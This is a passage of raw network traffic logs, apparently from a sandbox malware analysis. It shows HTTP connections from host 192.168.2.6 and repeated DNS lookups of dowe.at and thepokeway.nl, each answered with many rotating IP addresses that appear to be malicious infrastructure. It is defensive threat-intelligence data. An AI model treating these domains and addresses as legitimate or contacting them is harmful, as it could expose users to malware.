                    Nov 30, 2022 00:11:06.239725113 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.507853985 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.509285927 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.509438038 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.509569883 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779181957 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779318094 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779341936 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779361963 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779381037 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779402018 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779421091 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779442072 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779469967 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779474974 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779491901 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779517889 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779524088 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779562950 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779591084 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049257040 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049336910 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049379110 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049421072 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049422979 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049462080 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049470901 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049504042 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049546957 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049582005 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049603939 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049649954 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049675941 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049690962 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049731970 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049753904 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049786091 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049829006 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049858093 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049870014 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049920082 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049925089 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049959898 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049999952 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.050004005 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.050044060 CET8049725123.253.32.170192.168.2.6
                    TimestampSource PortDest PortSource IPDest IP
                    Nov 30, 2022 00:10:57.539028883 CET6291053192.168.2.68.8.8.8
                    Nov 30, 2022 00:10:58.022703886 CET53629108.8.8.8192.168.2.6
                    Nov 30, 2022 00:10:59.104090929 CET6386353192.168.2.68.8.8.8
                    Nov 30, 2022 00:10:59.585829020 CET53638638.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:01.073633909 CET6253853192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:01.562983036 CET53625388.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:03.599140882 CET5490353192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:03.619827986 CET53549038.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:04.708935022 CET5153053192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:04.729224920 CET53515308.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:20.956633091 CET6160953192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:20.978972912 CET53616098.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:22.561232090 CET5248153192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:22.578528881 CET53524818.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:23.650019884 CET5394353192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:24.170435905 CET53539438.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:25.679337978 CET5608653192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:25.698915958 CET53560868.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:27.249752998 CET5654753192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:27.268702984 CET53565478.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:29.865735054 CET5988153192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:29.909164906 CET53598818.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:34.537358999 CET5891753192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:34.555744886 CET53589178.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:35.817455053 CET6252053192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:35.837424994 CET53625208.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:37.053144932 CET5562953192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:37.070822954 CET53556298.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:38.141012907 CET5207953192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:38.159097910 CET53520798.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:39.139863968 CET5656953192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:39.178725958 CET53565698.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:40.692821026 CET6183353192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:40.713022947 CET53618338.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:41.800481081 CET6504453192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:41.821110964 CET53650448.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:42.937369108 CET6003253192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:42.970715046 CET53600328.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:44.522392035 CET4923253192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:44.541811943 CET53492328.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:45.507319927 CET5612353192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:45.526927948 CET53561238.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:47.124767065 CET5975253192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:47.144521952 CET53597528.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:48.973812103 CET5286553192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:48.991724968 CET53528658.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:50.177469969 CET5732253192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:50.196737051 CET53573228.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:51.373785019 CET6295853192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:51.391386986 CET53629588.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:52.608006954 CET6440453192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:52.630928993 CET53644048.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:53.755806923 CET6284853192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:53.780193090 CET53628488.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:55.344466925 CET5595653192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:55.366202116 CET53559568.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:56.383055925 CET5132153192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:56.403703928 CET53513218.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:57.562014103 CET6108953192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:58.053072929 CET53610898.8.8.8192.168.2.6
                    Nov 30, 2022 00:11:59.303905010 CET6276653192.168.2.68.8.8.8
                    Nov 30, 2022 00:11:59.321430922 CET53627668.8.8.8192.168.2.6
                    Nov 30, 2022 00:12:00.410181999 CET6013053192.168.2.68.8.8.8
                    Nov 30, 2022 00:12:00.430341005 CET53601308.8.8.8192.168.2.6
                    Nov 30, 2022 00:12:01.524296045 CET6273253192.168.2.68.8.8.8
                    Nov 30, 2022 00:12:01.541763067 CET53627328.8.8.8192.168.2.6
                    Nov 30, 2022 00:12:03.480338097 CET6069053192.168.2.68.8.8.8
                    Nov 30, 2022 00:12:03.497956991 CET53606908.8.8.8192.168.2.6
                    Nov 30, 2022 00:12:05.245548010 CET5675053192.168.2.68.8.8.8
                    Nov 30, 2022 00:12:05.265032053 CET53567508.8.8.8192.168.2.6
                    Nov 30, 2022 00:12:07.934282064 CET5933653192.168.2.68.8.8.8
                    Nov 30, 2022 00:12:07.953203917 CET53593368.8.8.8192.168.2.6
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Nov 30, 2022 00:10:57.539028883 CET192.168.2.68.8.8.80x8dc7Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.104090929 CET192.168.2.68.8.8.80x7cfcStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.073633909 CET192.168.2.68.8.8.80xec19Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.599140882 CET192.168.2.68.8.8.80x2110Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.708935022 CET192.168.2.68.8.8.80x4552Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.956633091 CET192.168.2.68.8.8.80xf6bfStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.561232090 CET192.168.2.68.8.8.80x12a6Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:23.650019884 CET192.168.2.68.8.8.80xec6cStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.679337978 CET192.168.2.68.8.8.80xc21bStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.249752998 CET192.168.2.68.8.8.80xe317Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:29.865735054 CET192.168.2.68.8.8.80xf2fcStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:34.537358999 CET192.168.2.68.8.8.80xbebbStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:35.817455053 CET192.168.2.68.8.8.80xfe43Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:37.053144932 CET192.168.2.68.8.8.80x1dafStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:38.141012907 CET192.168.2.68.8.8.80x2ef3Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:39.139863968 CET192.168.2.68.8.8.80x266eStandard query (0)thepokeway.nlA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:40.692821026 CET192.168.2.68.8.8.80x46fStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:41.800481081 CET192.168.2.68.8.8.80x8504Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:42.937369108 CET192.168.2.68.8.8.80xb003Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:44.522392035 CET192.168.2.68.8.8.80xa796Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:45.507319927 CET192.168.2.68.8.8.80xbe7eStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:47.124767065 CET192.168.2.68.8.8.80xb0e8Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:48.973812103 CET192.168.2.68.8.8.80xacd6Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:50.177469969 CET192.168.2.68.8.8.80xa191Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:51.373785019 CET192.168.2.68.8.8.80x66ccStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:52.608006954 CET192.168.2.68.8.8.80xacbdStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:53.755806923 CET192.168.2.68.8.8.80x4a2bStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:55.344466925 CET192.168.2.68.8.8.80x293bStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:56.383055925 CET192.168.2.68.8.8.80x1e39Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:57.562014103 CET192.168.2.68.8.8.80x9fa9Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.303905010 CET192.168.2.68.8.8.80x8adStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.410181999 CET192.168.2.68.8.8.80xd88aStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.524296045 CET192.168.2.68.8.8.80xcd8fStandard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.480338097 CET192.168.2.68.8.8.80x37f4Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.245548010 CET192.168.2.68.8.8.80xc889Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.934282064 CET192.168.2.68.8.8.80x9ea3Standard query (0)dowe.atA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:58.022703886 CET8.8.8.8192.168.2.60x8dc7No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:10:59.585829020 CET8.8.8.8192.168.2.60x7cfcNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:01.562983036 CET8.8.8.8192.168.2.60xec19No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:03.619827986 CET8.8.8.8192.168.2.60x2110No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:04.729224920 CET8.8.8.8192.168.2.60x4552No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:20.978972912 CET8.8.8.8192.168.2.60xf6bfNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:22.578528881 CET8.8.8.8192.168.2.60x12a6No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:24.170435905 CET8.8.8.8192.168.2.60xec6cNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:25.698915958 CET8.8.8.8192.168.2.60xc21bNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:27.268702984 CET8.8.8.8192.168.2.60xe317No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
